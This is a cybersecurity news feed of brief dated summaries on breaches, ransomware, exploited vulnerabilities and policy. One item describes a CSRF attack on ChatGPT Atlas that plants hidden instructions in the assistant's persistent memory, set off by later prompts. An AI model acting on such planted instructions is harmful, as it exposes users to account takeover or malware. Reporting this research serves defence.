CISA Warns of Critical ICS Flaws in Fuji, Delta, and Radiometrics Systems

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has released five advisories detailing critical vulnerabilities in Industrial Control Systems (ICS) from Fuji Electric, Survision, Delta Electronics, Radiometrics, and IDIS. The flaws, which include buffer overflows and authentication bypasses with CVSS scores up to 10.0, could allow remote code execution and severe disruption of critical infrastructure in sectors like manufacturing, energy, and aviation. CISA is urging immediate review and mitigation, as successful exploitation could lead to loss of control over industrial processes and, in some cases, create hazardous physical conditions.

Nov 5, 20255 min read

Swedish IT Firm Breach Exposes Data of 1.5 Million, Sparks GDPR Probe

The Swedish IT services firm Miljödata has suffered a severe data breach, exposing the personal and potentially sensitive information of over 1.5 million people. The incident, which occurred in late August, resulted in the stolen data being published on the darknet. In response, the Swedish Data Protection Authority (IMY) has launched a major investigation under the General Data Protection Regulation (GDPR), targeting both Miljödata and several of its public sector clients, including the City of Gothenburg and Region Västmanland.

Nov 5, 20254 min read

Identity is the New Perimeter: Stolen Credentials and Over-Privileged Accounts Drive Cloud Breaches

A consensus is forming across the cybersecurity industry: identity is the new security perimeter in the cloud. New reports from ReliaQuest and Amazon Web Services (AWS) reveal that identity-based attacks are the leading driver of cloud security incidents. Key findings show that compromised credentials caused 20% of breaches, while a staggering 99% of cloud identities are 'over-privileged,' possessing excessive permissions. Experts are urging a strategic shift away from network-centric security and towards a 'zero standing privileges' model, where access is granted on a temporary, as-needed basis to mitigate this massive attack surface.

Nov 5, 20253 min read

Hackers Claim Breach and Full Database Theft from Russian Nuclear Waste Facility 'Radon'

A threat actor has posted on a data leak forum claiming to have breached Radon, a Russian state-owned enterprise responsible for nuclear waste management and operated by the nuclear giant Rosatom. The attackers allege they have stolen the company's entire database, which reportedly includes sensitive test statistics, user IDs, and the personal information of employees. Security experts warn that if the claim is legitimate, the breach poses a severe risk, as the data could be used to forge safety documents, endanger physical safety, or launch sophisticated spear-phishing campaigns against Russia's critical nuclear infrastructure.

Nov 5, 20254 min read

F5 Hacked by Nation-State Actor; BIG-IP Source Code Stolen

F5 Networks has disclosed a severe security incident involving a 'highly sophisticated nation-state threat actor' that gained long-term access to its development environment. The attackers, suspected to be the Chinese espionage group UNC5221, successfully stole source code for F5's flagship BIG-IP products. While F5 found no evidence of a software supply chain compromise, the theft of these 'digital blueprints' creates a significant risk of future zero-day vulnerabilities. The Australian Cyber Security Centre (ACSC) has issued an urgent advisory, and F5 released a large batch of 44 new vulnerability patches concurrently with the disclosure.

Nov 4, 20255 min read

Millions of Devs at Risk: Critical RCE Flaw in Popular React Native Package

A critical remote code execution (RCE) vulnerability, CVE-2025-11953, has been discovered in a popular React Native command-line tool, putting millions of developers at risk. The flaw, rated 9.8 on the CVSS scale, exists in the '@react-native-community/cli' NPM package and allows an unauthenticated attacker to execute arbitrary code on a developer's machine by sending a malicious request to the Metro development server. This could lead to source code theft, malware injection, or a full-blown supply chain attack. Meta has released a patch, and developers are strongly urged to update their dependencies.

Nov 4, 20253 min read

Conti's Ghost: New 'DragonForce' Ransomware Adopts Cartel Model

A new ransomware operation named DragonForce has been identified by security researchers, notable for its use of leaked source code from the infamous Conti ransomware. Instead of a traditional Ransomware-as-a-Service (RaaS) model, DragonForce operates with a 'cartel-like' structure, providing affiliates with a builder to create their own branded ransomware variants. This approach facilitates the rapid proliferation of new threats, with groups like 'Devman' already seen deploying malware created with the DragonForce builder. The core malware retains Conti's technical features, including its encryption scheme and ability to spread via SMB.

Nov 4, 20254 min read

EU Stress-Tests Cyber Defenses in Large-Scale Crisis Simulation

The European Union has concluded its 2025 'Blueprint Operational Level Exercise' (BlueOLEx), a large-scale simulation designed to test and improve the bloc's collective response to major cybersecurity crises. Hosted in Cyprus with support from the EU's cybersecurity agency, ENISA, the exercise brought together senior officials from all member states to role-play a significant cyber incident affecting critical sectors. The drill was the first to test the new EU Cyber Blueprint, which aims to clarify roles and streamline coordination between national authorities and the European Commission during a cross-border attack.

Nov 4, 20253 min read

Philippine Police Brace for Coordinated DDoS Attacks on Government Websites

The Philippine National Police (PNP) has mobilized its cybersecurity units and placed them on high alert in anticipation of a potential large-scale distributed denial-of-service (DDoS) campaign targeting government websites. According to intelligence, the attacks are slated to begin on November 5, 2025. The PNP is coordinating with the Department of Information and Communications Technology (DICT) and other national agencies to harden critical digital infrastructure and prepare rapid response teams to mitigate any disruption to public services.

Nov 4, 20254 min read

US Cyber Threat Sharing Law 'CISA 2015' Expires, Creating Potential Intelligence Gap

The Cybersecurity Information Sharing Act of 2015 (CISA 2015), a foundational U.S. law that provided liability protections to encourage private companies to share cyber threat data with the government, expired on October 1, 2025. Amidst a government shutdown and a block by Senator Rand Paul, lawmakers failed to reauthorize the act. Security and legal experts warn this could have a chilling effect on threat intelligence sharing, with one law firm predicting a potential 80% drop. The lapse creates uncertainty and could hinder national cybersecurity efforts. In response, new legislation, the PACT Act, has been introduced to retroactively restore and extend the protections, but its future is uncertain.

Nov 3, 20255 min read

Insider Threat Shocker: Cybersecurity Pros Indicted for Wielding ALPHV/BlackCat Ransomware

In a severe breach of trust, two cybersecurity professionals, Ryan Clifford Goldberg and Kevin Tyler Martin, have been indicted for allegedly conducting ALPHV/BlackCat ransomware attacks against at least five U.S. companies. The individuals, who held roles in incident response and ransomware negotiation, are accused of conspiring to extort nearly $1.3 million from a Florida medical company. This case highlights a critical insider threat risk within the cybersecurity industry itself, where trusted professionals abuse their knowledge and access for criminal gain.

Nov 3, 20254 min read

SK Telecom Profit Plummets 90% Following Massive Data Breach Affecting 27 Million Customers

South Korean telecom giant SK Telecom has reported a catastrophic 90% drop in its Q3 operating profit, directly attributing the loss to the massive costs of a data breach that exposed the personal data of 27 million customers. The breach, which went undetected for nearly three years, involved 25 different malware types and led to a record $96.5 million (134 billion won) fine from regulators. This incident serves as a stark illustration of the severe and tangible financial consequences of long-term cybersecurity failures and inadequate threat detection.

Nov 3, 20254 min read

China Amends Cybersecurity Law, Massively Increasing Fines and Adding AI Governance Clause

China has passed major amendments to its 2016 Cybersecurity Law, set to take effect on January 1, 2026. The changes dramatically increase financial penalties for non-compliance, raising the maximum fine for Critical Information Infrastructure Operators (CIIOs) tenfold to RMB 10 million (approx. $1.41M) and for non-CIIOs to RMB 2 million. The amendments also introduce a new, general clause on Artificial Intelligence governance, signaling tighter regulatory control over technology and data security within the country.

Nov 3, 20254 min read

Microsoft Discovers 'SesameOp' Backdoor Using OpenAI API for Covert C2

Microsoft's Detection and Response Team (DART) has discovered a novel backdoor named 'SesameOp' that uniquely uses the OpenAI Assistants API for its command-and-control (C2) communications. Found during an espionage investigation, the malware hides its malicious traffic within legitimate API calls to the OpenAI platform, making it extremely difficult to detect. The attackers also used .NET AppDomainManager injection by compromising Microsoft Visual Studio utilities to achieve persistence.

Nov 3, 20255 min read

Europe Now #2 Global Ransomware Target, Attacks Accelerating to 24-Hour Deployments

Europe is now the second-largest global target for ransomware, accounting for 22% of all victims, according to CrowdStrike's 2025 European Threat Landscape Report. The report highlights a dramatic increase in attack speed, with groups like SCATTERED SPIDER now able to deploy ransomware in just 24 hours from initial access. The threat is fueled by a thriving initial access broker (IAB) market and escalating geopolitical tensions involving Russian, Chinese, and North Korean state-sponsored actors targeting critical sectors.

Nov 3, 20255 min read

Cl0p Ransomware Exploits Oracle EBS Zero-Day in Active Attacks

The notorious Cl0p ransomware gang is actively exploiting a critical zero-day vulnerability, CVE-2025-61882, in Oracle's E-Business Suite (EBS) to gain initial access to corporate networks. The complex flaw, which allows for remote code execution, has already been linked to at least two major security incidents, including a breach at Harvard University. With mass exploitation now being reported, organizations using Oracle EBS are at immediate and significant risk and are urged to apply mitigations immediately.

Nov 3, 20258 min read

Penn Data Breach: Hacker Claims 1.2M Donor Records Stolen, Exposes "Terrible Security"

A threat actor has claimed responsibility for a massive data breach at the University of Pennsylvania, asserting they have stolen the personal and financial data of 1.2 million donors and alumni. The breach was first revealed after offensive emails were sent from a university system hosted on Salesforce Marketing Cloud. The attacker claims to have gained initial access via a compromised employee single sign-on (SSO) account, which provided a gateway to sensitive platforms including Salesforce, Qlik, SAP, and SharePoint. Data samples, including highly sensitive demographic and financial information, were shared to substantiate the claims, highlighting severe security lapses at the institution.

Nov 2, 20256 min read

Polish Government Confirms "Very Serious" Data Breach at SuperGrosz Loan Platform

Polish authorities, led by the Deputy Prime Minister, have confirmed a "very serious" data breach at the online loan platform SuperGrosz. The attack resulted in the theft of a vast repository of sensitive customer information, including full names, national identification (PESEL) numbers, ID card details, bank account numbers, and detailed employment information. Poland's national cybersecurity teams have launched a full investigation, and the government has issued a public warning urging affected customers to take immediate security measures to prevent identity theft, such as blocking their PESEL numbers.

Nov 2, 20255 min read

Google Patches Critical Zero-Click RCE Flaw in Android; Millions of Devices at Risk

Google's November 2025 Android Security Bulletin includes a patch for a critical zero-click remote code execution (RCE) vulnerability, tracked as CVE-2025-48593. The flaw, residing in the Android System component, affects Android versions 13, 14, 15, and 16, and allows remote attackers to compromise a device without any user interaction. Due to its severity and zero-click nature, the vulnerability poses a severe risk to users. The update also addresses a high-severity privilege escalation flaw, CVE-2025-48581. Users are urged to install the update as soon as it becomes available.

Nov 2, 20254 min read

"SleepyDuck" RAT Emerges in Open VSX Marketplace via Malicious Update

A new remote access trojan (RAT) named "SleepyDuck" has been discovered in the Open VSX marketplace, a popular repository for IDE extensions. A seemingly benign developer extension, 'juan-bianco.solidity-vlang', was updated on November 1, 2025, to include the malware after it had already been downloaded thousands of times. SleepyDuck activates when a user opens a new editor window or a Solidity file. In a sophisticated twist, the malware uses an Ethereum smart contract for a resilient and dynamic command-and-control (C2) infrastructure, allowing it to fetch updated C2 server addresses from the blockchain.

Nov 2, 20255 min read

Samsung's November Security Update Patches 45 Vulnerabilities, Including Critical Android Flaws

Samsung has released its November 2025 security maintenance release, delivering patches for 45 vulnerabilities affecting its Galaxy smartphones and tablets. The update incorporates Google's latest Android patches, including a fix for the critical zero-click RCE vulnerability CVE-2025-48593. Additionally, the release addresses 9 Samsung-specific vulnerabilities (SVEs), including high-severity flaws in the fingerprint trustlet and image codec library, as well as 11 security issues in its Exynos chipsets. Users are advised to install the update promptly.

Nov 2, 20254 min read

openSUSE Patches Moderate-Severity Flaws in X.Org Server

The openSUSE project released a security advisory on November 1, 2025, to address three moderate-severity vulnerabilities in the xorg-x11-server package for its Tumbleweed distribution. The flaws could lead to out-of-bounds memory access, potentially resulting in denial-of-service via server crashes or, in some cases, privilege escalation. Users of openSUSE Tumbleweed are advised to apply the update to mitigate the risks.

Nov 2, 20253 min read

T-Mobile Enters Credit Card Market with Capital One, Raising Data Security Questions

T-Mobile announced its entry into the financial services sector with the launch of its first-ever credit card, created in partnership with banking giant Capital One. This strategic move will leverage T-Mobile's vast customer base and Capital One's financial infrastructure. The partnership introduces significant cybersecurity and data privacy considerations, as it creates a new, complex data environment merging telecommunications and financial information. Both companies have histories of data breaches, making robust security and compliance with regulations like PCI DSS critical for the new venture's success.

Nov 2, 20254 min read

China-Backed Group Exploits Unpatched Windows Flaw to Spy on EU Diplomats

A China-linked cyber-espionage group, UNC6384, associated with Mustang Panda, is actively exploiting an unpatched Windows UI misrepresentation vulnerability, CVE-2025-9491, to conduct espionage against European diplomatic entities. The campaign, active since September 2025, uses sophisticated phishing emails containing malicious LNK files themed around EU and NATO events. These files trigger a multi-stage attack that deploys the PlugX RAT via DLL side-loading. Despite being reported in 2024 and publicly disclosed in March 2025, Microsoft has decided not to issue a security patch, stating the flaw does not meet its bar for servicing.

Nov 1, 20255 min read

Akira Ransomware Claims Breach of Apache OpenOffice, Threatens Data Leak

The prolific Akira ransomware group has listed Apache OpenOffice, a popular open-source office suite, as a victim on its dark web data leak site. The threat actors claim to have exfiltrated 23 gigabytes of data from the Apache Software Foundation, including financial records, internal documents, and employee personally identifiable information (PII). As of November 1, 2025, the alleged breach has not been confirmed by the Apache Software Foundation, leaving the scope and authenticity of the claim unverified.

Nov 1, 20254 min read

Ukrainian Conti Ransomware Affiliate Extradited to US

Oleksii Lytvynenko, a 43-year-old Ukrainian national, has been extradited from Ireland to the United States for his alleged role in the notorious Conti ransomware syndicate. He pleaded not guilty in a Tennessee federal court to charges of conspiracy to commit computer fraud and extortion. Lytvynenko is accused of participating in attacks by the Conti group, which extorted over $150 million from more than 1,000 victims worldwide. If convicted, he faces a potential prison sentence of up to 25 years.

Nov 1, 20254 min read

New 'KYBER' Ransomware Emerges with Advanced Encryption and Data-Driven Extortion Model

Cybersecurity researchers at CYFIRMA have identified a new ransomware strain named KYBER, which employs a sophisticated hybrid encryption scheme including the post-quantum Kyber1024 algorithm. The ransomware, discovered on underground forums, follows a double-extortion model, threatening to leak stolen data if victims do not establish contact within two weeks. KYBER targets Windows systems in English-speaking countries, with a focus on high-value sectors like Aerospace & Defense and technology. Researchers warn it may evolve into a full-fledged Ransomware-as-a-Service (RaaS) operation.

Nov 1, 20254 min read

Australia Warns of 'BADCANDY' Malware Targeting Unpatched Cisco Devices

The Australian Signals Directorate (ASD) has issued an urgent warning about an ongoing cyberattack campaign deploying a new malware implant called 'BADCANDY' on unpatched Cisco IOS XE devices. The attackers are exploiting the critical remote code execution vulnerability CVE-2023-20198 (CVSS 10.0) to gain full control of routers and switches. The ASD reports a recent spike in activity, with 150 Australian devices infected in October 2025 alone. The malware, a non-persistent web shell, is being actively redeployed by attackers even after removal.

Nov 1, 20254 min read

Data Breaches Hit Toys 'R' Us Canada, Askul, and Verisure

A wave of data breaches has impacted several consumer-facing companies globally. Toys "R" Us Canada has had customer records leaked on the dark web. Japanese retailer Askul suffered a disruptive ransomware attack that halted operations and may have resulted in a data leak. Additionally, Swedish security firm Verisure disclosed a breach affecting 35,000 customers via a third-party vendor, and U.S.-based Jewett-Cameron Trading reported the theft of financial documents.

Oct 31, 20254 min read

CISA KEV Alert: XWiki RCE Flaw Actively Exploited for Cryptomining

The US Cybersecurity and Infrastructure Security Agency (CISA) has added a critical remote code execution (RCE) vulnerability in the XWiki enterprise wiki platform, CVE-2025-24893, to its Known Exploited Vulnerabilities (KEV) catalog. The flaw, rated 9.8 on the CVSS scale, allows an unauthenticated attacker to execute arbitrary code by injecting malicious Groovy expressions into a search query. Security researchers at VulnCheck have confirmed active exploitation in the wild, with attackers using the vulnerability to deploy cryptocurrency mining malware. CISA has mandated that federal agencies patch the flaw promptly due to the immediate risk.

Oct 31, 20254 min read

VMware Zero-Day LPE Flaw Exploited by China-Linked Actor Added to CISA KEV

CISA has added CVE-2025-41244, a high-severity local privilege escalation (LPE) vulnerability in VMware products, to its Known Exploited Vulnerabilities (KEV) catalog. The flaw affects VMware Aria Operations and VMware Tools and allows a non-administrative user on a virtual machine to gain root privileges. The vulnerability has been exploited as a zero-day since mid-October 2024, with attribution pointing to UNC5174, a suspected China-linked threat actor. The flaw is an untrusted search path vulnerability, and a public proof-of-concept is available, increasing the risk to unpatched systems.

Oct 31, 20254 min read

Finance Execs Targeted in Sophisticated LinkedIn Phishing Scheme with Fake Board Invites

A sophisticated phishing campaign is targeting finance executives through LinkedIn direct messages, using fake invitations to an executive board as a lure. The multi-stage attack, detailed by Push Security, aims to harvest Microsoft credentials and session cookies to bypass MFA. The attack chain leverages trusted services to appear legitimate, starting with a Google open redirect, leading to a fraudulent portal hosted on Google Firebase, and using a Cloudflare CAPTCHA to evade security bots. This non-email-based phishing vector is reportedly becoming significantly more common, accounting for over a third of recent attempts tracked by researchers.

Oct 31, 20255 min read

Telecom Giant Ribbon Communications Breached by Nation-State Actor for 10 Months

Telecommunications provider Ribbon Communications has disclosed a significant security breach by a suspected nation-state actor. According to an SEC filing, the attackers first gained access in December 2024 and remained undetected for nearly a year until September 2025. The company, which serves critical clients including the U.S. Department of Defense and major carriers like Verizon, stated the actor accessed several customer files stored on two laptops outside the main network. The long dwell time and the nature of the target suggest a sophisticated espionage campaign, raising serious concerns about supply chain security in the telecommunications sector.

Oct 31, 20255 min read

Canada Issues National Alert as Hacktivists Target Critical Infrastructure

The Canadian Centre for Cyber Security, along with the RCMP, has issued a national alert warning of increasing cyberattacks by hacktivists against the nation's critical infrastructure. The advisory follows multiple successful breaches of internet-accessible Industrial Control Systems (ICS) in sectors like water treatment, food, and manufacturing. The alert notes a tactical shift by hacktivists from simple DDoS attacks to more disruptive intrusions into Operational Technology (OT). Authorities are urging organizations, especially in under-regulated sectors, to immediately inventory and secure exposed ICS/OT devices, recommending VPNs with 2FA and enhanced monitoring to mitigate the risk to public safety.

Oct 31, 20254 min read

Conduent Data Breach: 10 Million+ Individuals' Personal & Medical Data Exposed

Conduent Business Services, a major contractor for U.S. government agencies, has disclosed a massive data breach impacting over 10 million individuals. The incident, which occurred between October 2024 and January 2025, involved an unauthorized third party gaining access to Conduent's network and exfiltrating files. The compromised data is highly sensitive, including names, Social Security numbers, medical information, and health insurance details. The breach has affected residents across numerous states, including Texas, Washington, and California, and has triggered a legal investigation by the law firm Edelson Lechtzin LLP into the company's data privacy practices.

Oct 31, 20254 min read

Ad Giant Dentsu's Subsidiary Merkle Hit by Cyberattack, Staff and Client Data Exposed

Global advertising firm Dentsu has confirmed that its US-based customer experience management (CXM) subsidiary, Merkle, was the target of a cyberattack. The company detected 'abnormal activity' on Merkle's network and proactively shut down certain systems to contain the threat. An investigation has confirmed that the incident led to the exposure of both staff and sensitive client data. Merkle, a major player in the CXM industry, handles large volumes of customer data, making it a high-value target for threat actors. The full scope of the breach is still under investigation.

Oct 30, 20254 min read

EY Leaks 4TB+ SQL Database Packed with Corporate Secrets via Cloud Misconfiguration

Consulting giant EY (Ernst & Young) inadvertently exposed a massive, 4TB+ SQL Server backup file to the public internet due to a cloud storage misconfiguration. The unencrypted `.BAK` file, discovered by researchers at Neo Security, contained a treasure trove of highly sensitive internal data, including API keys, service account passwords, session tokens, and user credentials. The incident highlights the severe risks associated with cloud service misconfigurations, where tools designed for convenience can lead to catastrophic data exposure if not secured properly. Neo Security described the leak as equivalent to finding the 'master blueprint and physical keys to a vault.'

Oct 30, 20255 min read

IncRansom Claims 20TB Data Heist from Evolve Mortgage Services

The 'incransom' ransomware group has claimed responsibility for a significant data breach at Evolve Mortgage Services, listing the company on its dark web leak site on October 30, 2025. The attackers allege they have stolen over 20 terabytes of data, including 2 terabytes of databases containing sensitive PII such as Social Security numbers, client IDs, and full credit histories dating back to 2016. The group is using a pure data-theft extortion model, threatening to leak the data after claiming the company refused to negotiate. This incident highlights the ongoing threat of data extortion attacks against the U.S. financial services sector.

Oct 30, 20255 min read

New 'logins[.]zip' Infostealer Claims 99% Credential Theft in 12 Seconds Using Zero-Days

A new Malware-as-a-Service (MaaS) infostealer named 'logins[.]zip' is being sold on the clear web, boasting incredible speed and efficiency. According to a report from Hudson Rock, its authors claim it can exfiltrate 99% of passwords and cookies from a victim's machine in under 12 seconds. The stealer's key selling point is its alleged use of two Chromium zero-day exploits, which allow it to steal credentials without needing admin rights. The service, sold for $150/month, provides a browser-based builder for creating polymorphic stubs and targets logins, cookies, payment cards, and crypto wallets.

Oct 30, 20255 min read

UK's NCSC Warns 'Nationally Significant' Cyber Attacks Have More Than Doubled

The UK's National Cyber Security Centre (NCSC) has released its 2025 Annual Review, revealing a stark increase in major cyber threats. The agency handled 204 'nationally significant' incidents in the past year, more than double the 89 from the previous year. Ransomware remains the most acute threat, particularly to the UK's Critical National Infrastructure (CNI). The report highlights a growing gap between the escalating threats from APTs and cybercriminals and the nation's collective defenses, prompting the NCSC to urge all UK businesses to make cyber resilience a board-level priority and adopt foundational security controls.

Oct 29, 20255 min read

Qantas Data Breach: 5.7M Customer Records Leaked in Salesforce Supply Chain Attack

The personal data of 5.7 million Qantas Airways customers has been published on the dark web by a group calling itself 'Scattered Lapsus$ Hunters'. The leak, which occurred after a ransom deadline passed on October 11, 2025, is part of a broader supply chain attack that compromised a third-party Salesforce system used by one of the airline's offshore call centers. The compromised data includes names, emails, frequent flyer information, and for some, addresses, phone numbers, and dates of birth. The attack vector involved social engineering, with hackers impersonating Salesforce employees to gain access. Qantas confirmed the breach, stating it is one of 39 companies affected by the campaign and that financial data and passwords were not compromised. The incident has prompted warnings of secondary phishing attacks and a class-action complaint.

Oct 29, 20257 min read

Clop Ransomware Breaches American Airlines Subsidiary Envoy Air, Exploiting Oracle EBS Flaw

Envoy Air, a regional airline owned by American Airlines, has confirmed it was a victim of a hacking campaign orchestrated by the Clop ransomware group. The attackers exploited vulnerabilities in Oracle's E-Business Suite (EBS) to gain access and exfiltrate data. While Envoy Air states that no sensitive customer or personal data was compromised, the breach involved some business information and commercial contacts. Clop has listed American Airlines among more than 60 victims of its recent campaign targeting unpatched Oracle systems, threatening to leak stolen data if ransoms are not paid.

Oct 28, 20255 min read

Infostealer Malware Campaign Dumps 183 Million Credentials Online

A colossal 3.5-terabyte dataset named "Synthient," containing 183 million unique email and password combinations, has been indexed by Have I Been Pwned. The credentials were not stolen from a single service breach but were aggregated over time from devices infected with infostealer malware such as RedLine and Vidar. While Google confirmed its systems were not directly compromised, the leak poses a severe risk of credential stuffing attacks across countless online services. The data includes 16.4 million credentials never before seen in breach databases, highlighting the ongoing threat of malware-based data harvesting. Security experts urge immediate password updates and the adoption of multi-factor authentication (MFA).

Oct 28, 20255 min read

Cerner Discloses Patient Data Breach at Alaskan Hospital Months After Initial Intrusion

Electronic health records (EHR) vendor Cerner Corporation has informed Mat-Su Regional Medical Center in Alaska of a data breach affecting patient information. The security incident, which involved unauthorized access to legacy Cerner systems, was first detected in February 2025 but originated as early as January. The compromised data could include patient names, Social Security numbers, medical records, diagnoses, and other sensitive health information. The breach did not affect the hospital's own systems, but highlights significant supply chain risks in the healthcare sector. Cerner is offering two years of identity protection services to affected patients.

Oct 28, 20255 min read

Slow Email Breach Response Leads to 79% Higher Ransomware Risk, Report Finds

A new report from Barracuda Networks reveals a strong correlation between slow incident response times for email breaches and the likelihood of a subsequent ransomware attack. Organizations that take over nine hours to remediate an email compromise face a 79% higher chance of also being hit by ransomware. The study found that 78% of organizations experienced an email breach in the last year, with attackers often gaining access and deploying ransomware in under an hour. The high cost of recovery, especially for small businesses, underscores the critical need for automated detection and rapid response capabilities to contain initial email-based threats.

Oct 28, 20255 min read

CISA Warns of Actively Exploited Flaws in Dassault Systèmes' Manufacturing Software

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added two vulnerabilities in Dassault Systèmes' DELMIA Apriso manufacturing software to its Known Exploited Vulnerabilities (KEV) catalog. The flaws, CVE-2025-6205 (CVSS 9.1) and CVE-2025-6204 (CVSS 8.0), are being actively exploited in the wild. Attackers can chain them to create a privileged user account and then achieve remote code execution, leading to a full system compromise. The software is widely used in critical manufacturing sectors like automotive and aerospace. Federal agencies have been given a three-week deadline to apply patches released in August 2025.

Oct 28, 20255 min read

Apache Tomcat Flaws Expose Servers to Path Traversal and RCE Risk

The Apache Software Foundation has disclosed two new vulnerabilities impacting Apache Tomcat versions 9, 10, and 11. The most severe flaw, CVE-2025-55752, is a directory traversal vulnerability rated 'Important' that could allow an attacker to bypass security constraints and access protected directories like /WEB-INF/. If HTTP PUT requests are enabled—a non-default setting—this flaw can be escalated to achieve remote code execution (RCE). A second, low-severity flaw, CVE-2025-55754, affects Windows systems and could lead to code execution via malicious console log entries. Users are urged to upgrade to the latest versions to mitigate these risks.

Oct 28, 20255 min read

North Korean APT BlueNoroff Uses AI-Driven Spyware in New 'GhostCall' and 'GhostHire' Campaigns

The North Korean APT group BlueNoroff is conducting two new financially motivated campaigns, 'GhostCall' and 'GhostHire,' targeting the cryptocurrency and venture capital sectors. According to research from Kaspersky, the group is using sophisticated social engineering, enhanced by generative AI, to lure executives and developers on both Windows and macOS. The attacks involve fake meetings and job offers to trick victims into downloading malware capable of stealing cryptocurrency wallet data, macOS Keychain contents, and other sensitive information. The campaigns show BlueNoroff's increasing focus on macOS and its adoption of AI to accelerate malware development.

Oct 28, 20256 min read

Hacking Team Successor Memento Labs Linked to Chrome Zero-Day and 'Dante' Spyware

Kaspersky researchers have linked Memento Labs, the Italian company that succeeded the notorious surveillance vendor Hacking Team, to a cyber-espionage campaign that used a Google Chrome zero-day (CVE-2025-2783). The campaign, dubbed "Operation ForumTroll," targeted entities in Russia and Belarus with phishing links that installed spyware called "Dante." Analysis of Dante revealed code similarities to Hacking Team's old RCS spyware, confirming it as a commercial surveillance tool. The zero-day exploit allowed for infection simply by visiting a malicious website, highlighting the continued threat posed by commercial spyware vendors.

Oct 28, 20256 min read

Cisco and Citrix VPNs Linked to 5-7x Higher Ransomware Risk, At-Bay Report Finds

A new report from cyber-insurance provider At-Bay identifies email and remote access as the entry points for 90% of cyber claims in 2024. The 2025 InsurSec Rankings Report found that organizations using on-premise VPNs from vendors like Cisco and Citrix were five to seven times more likely to suffer a ransomware attack compared to those using other remote access solutions. Email fraud, often powered by AI, also saw a 30% surge in claim frequency. The report highlights the effectiveness of Managed Detection and Response (MDR) services in mitigating ransomware and ranks Sophos as the top-performing email security solution.

Oct 28, 20255 min read

Fortinet Silently Patches Critical, Actively Exploited FortiWeb Zero-Day

Fortinet has quietly released a patch for a critical, actively exploited zero-day vulnerability in its FortiWeb Web Application Firewall (WAF). The flaw, tracked as CVE-2025-64446 (CVSS 9.8), is a path traversal vulnerability that allows an unauthenticated remote attacker to create an administrator account and gain full control of the device. Attacks have been observed since at least early October 2025. Fortinet released the fix in version 8.0.2 on October 28 but did not immediately issue a public advisory, delaying awareness. The vulnerability was later added to CISA's KEV catalog, confirming its threat and mandating urgent patching.

Oct 28, 20255 min read

City of Gloversville, NY, Pays Partial Ransom After Attack Compromises Employee Data

The City of Gloversville, New York, has suffered a ransomware attack that was discovered on October 27, 2025. The attack disrupted city computer systems and compromised the personal and payroll information of current and former employees, including bank account numbers. After initially demanding $300,000, the city council approved a partial ransom payment of $150,000 to the unnamed threat actors in exchange for the return of the stolen data. The incident highlights the ongoing vulnerability of municipalities to ransomware attacks.

Oct 28, 20255 min read

Microsoft Report: AI-Generated Phishing Now 4.5x More Effective, Bypassing Traditional Defenses

According to the Microsoft 2025 Digital Defense Report, the effectiveness of phishing attacks has surged with the adoption of artificial intelligence. AI-generated emails now achieve a 54% click-through rate, 4.5 times higher than traditional methods. The report, covering July 2024 to June 2025, also highlights a 32% increase in identity-based attacks and the growing use of AI by nation-state actors for disinformation. Microsoft stresses that phishing-resistant MFA remains the most effective defense, blocking over 99% of identity attacks.

Oct 27, 20255 min read

CISA Orders Federal Agencies to Patch New Actively Exploited Vulnerability

On October 22, 2025, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a new, unspecified vulnerability to its Known Exploited Vulnerabilities (KEV) catalog. This action confirms that the flaw is being actively exploited in the wild by malicious actors. Under Binding Operational Directive (BOD) 22-01, all Federal Civilian Executive Branch (FCEB) agencies are now required to remediate this vulnerability by a specific deadline to protect federal networks. While the CVE identifier was not immediately released, the alert serves as a critical warning to all organizations to prioritize its patching.

Oct 27, 20255 min read

18 Minutes to Mayhem: Ransomware Attacks Now Fully Automated, Slashing Defender Response Time

A new report from ReliaQuest reveals a dramatic acceleration in ransomware attacks, with the average time from initial access to lateral movement ('breakout time') plummeting to just 18 minutes. This is a significant decrease from 48 minutes in 2024, driven by the adoption of automation and AI by 80% of Ransomware-as-a-Service (RaaS) groups. The report highlights the Qilin ransomware gang as a prime example, whose platform automates key attack phases like discovery, backup deletion, and encryption. Other groups like LockBit are also integrating AI to enhance their operations, creating a hyper-competitive landscape where speed and automation are paramount. This shrinking response window poses a monumental challenge for security teams, demanding automated detection and response capabilities to counter the threat.

Oct 27, 20257 min read

Critical Adobe Commerce Flaw Under Active Exploitation, CISA Warns

A critical improper input validation vulnerability in Adobe Commerce and Magento, tracked as CVE-2025-54236, is being actively exploited in the wild. Dubbed 'SessionReaper,' the flaw allows an unauthenticated remote attacker to hijack user sessions via the REST API, leading to potential web shell deployment and complete store takeover. CISA has added the vulnerability to its KEV catalog, and with reports suggesting over 60% of Magento stores remain unpatched, immediate action is urged for all administrators.

Oct 27, 20255 min read

ChatGPT Flaw Allows 'Memory Poisoning' via CSRF Attack

A novel vulnerability discovered in OpenAI's ChatGPT Atlas web browser allows attackers to perform 'memory poisoning' through a Cross-Site Request Forgery (CSRF) attack. Researchers at LayerX Security found that this flaw can be used to invisibly inject malicious instructions into ChatGPT's persistent 'Memory' feature. These instructions survive across sessions and devices, and can be triggered by a user's normal prompts to execute malicious code, potentially leading to account takeover or malware deployment.

Oct 27, 20254 min read

APT-C-60 Escalates 'SpyGlace' Campaign Against Japan

The South Korea-aligned cyber-espionage group APT-C-60 has significantly intensified its campaign against Japanese organizations in the third quarter of 2025. According to JPCERT/CC and Cyble, the group has deployed at least three new versions of its custom 'SpyGlace' backdoor. The attackers have evolved their tactics, now attaching malicious VHDX files directly to phishing emails and abusing legitimate services like GitHub and StatCounter for stealthy command-and-control communications and malware delivery, making detection more challenging.

Oct 27, 20254 min read

Healthcare Sector Rocked by Breaches at ModMed, LifeBridge, and Right at Home

The healthcare sector continues to be a prime target for cyberattacks, with recent data breaches announced by Electronic Health Record (EHR) provider Modernizing Medicine (ModMed), home healthcare provider Right at Home, and Baltimore-based LifeBridge Health. The incidents, which include a ransomware attack claimed by the Sinobi group and a third-party breach via Oracle Health, have exposed a vast range of sensitive Protected Health Information (PHI), including Social Security numbers, medical diagnoses, and financial data.

Oct 27, 20254 min read

DDoS Attack on Russian Food Agency Cripples National Supply Chains

